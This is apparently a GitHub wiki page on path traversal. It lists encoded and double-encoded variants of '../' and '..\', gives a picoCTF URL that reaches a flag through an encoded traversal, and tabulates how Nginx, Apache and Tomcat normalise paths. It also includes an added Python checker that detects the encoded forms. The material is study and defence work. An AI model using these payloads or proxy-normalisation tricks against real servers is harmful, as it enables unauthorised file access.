Path traversal - ianchen0119/About-Security GitHub Wiki
Getting to the point
Request variations
Encoding and double encoding:
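- %2e%2e%2f represents ../
- %2e%2e/ represents ../
- ..%2f represents ../
- %2e%2e%5c represents ..\
- %2e%2e\ represents ..\
- ..%5c represents ..\
- %252e%252e%255c represents ..\
- ..%255c represents ..\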
Percent encoding (also known as URL encoding): note that web containers perform one level of decoding on percent-encoded values from forms and URLs.
- ..%c0%af represents ../
- ..%c1%9c represents ..\
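A server-side check for the encoded forms listed above, added here as an example (it is not code from the original wiki). It decodes the path until it stops changing, rejects byte sequences that are not valid UTF-8, and only then looks for `..` segments; the function names, verdict strings and `MAX_ROUNDS` cap are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 5  # assumed cap on nested percent-encoding layers


def naive_filter(raw: str) -> bool:
    """Weak check: only sees literal traversal sequences in the raw path."""
    return "../" in raw or "..\\" in raw


def classify_path(raw: str) -> str:
    """Decode to a fixed point, then look for '..' path segments.

    Returns 'ok', 'traversal', 'traversal-multi-encoded',
    'multi-encoded', 'invalid-utf8' or 'too-many-layers'.
    """
    data = raw.encode("utf-8")
    rounds = 0
    while True:
        decoded = unquote_to_bytes(data)
        if decoded == data:          # nothing left to decode
            break
        rounds += 1
        if rounds > MAX_ROUNDS:
            return "too-many-layers"
        data = decoded
    try:
        # Strict decoding rejects sequences such as C0 AF and C1 9C.
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return "invalid-utf8"
    # Treat both '/' and '\' as separators, as the list above does.
    has_dotdot = ".." in re.split(r"[/\\]", text)
    if has_dotdot:
        return "traversal" if rounds <= 1 else "traversal-multi-encoded"
    return "ok" if rounds <= 1 else "multi-encoded"


# Constructed sample inputs: encoded forms from this page plus two benign paths.
SAMPLES = ["%2e%2e%2f", "%2e%2e/", "..%2f", "%2e%2e%5c", "%2e%2e\\", "..%5c",
           "%252e%252e%255c", "..%255c", "..%c0%af", "..%c1%9c",
           "/static/app.js", "/files/report%20v2.pdf"]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p:24} naive={naive_filter(p)!s:5} verdict={classify_path(p)}")
```

The literal-string filter reports `False` for every encoded sample, while the fixed-point check flags each of them and still accepts the two benign paths.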
Case study: Super Serial
The flag is here:
http://mercury.picoctf.net:port/%2e%2e%2f/flag
Reverse Proxy Server Bypass
Reverse proxy uses

- Load Balancing
- Security Protection
- Rewrite HTTP Res/Req
Common reverse proxies
- Nginx
- HAProxy
- Varnish HTTP Cache
- Tr(ae)fik
- Apache
- Squid
- Pound
URL Passing
- Nginx
| Input | Normalized |
|---|---|
| /path/.. | / |
| // | / |
| /res/flag1/..//../flag2 | /flag2 |
| /PATH/..;/ | /PATH/..;/ |
- Apache
| Input | Normalized |
|---|---|
| /path/.. | / |
| // | // |
| /res/flag1/..//../flag2 | /res/flag2 |
| /PATH/..;/ | /PATH/..;/ |
- Tomcat
| Input | Normalized |
|---|---|
| /path/.. | / |
| // | / |
| /res/flag1/..//../flag2 | /flag2 |
| /PATH/..;/ | /PATH (support path parameters) |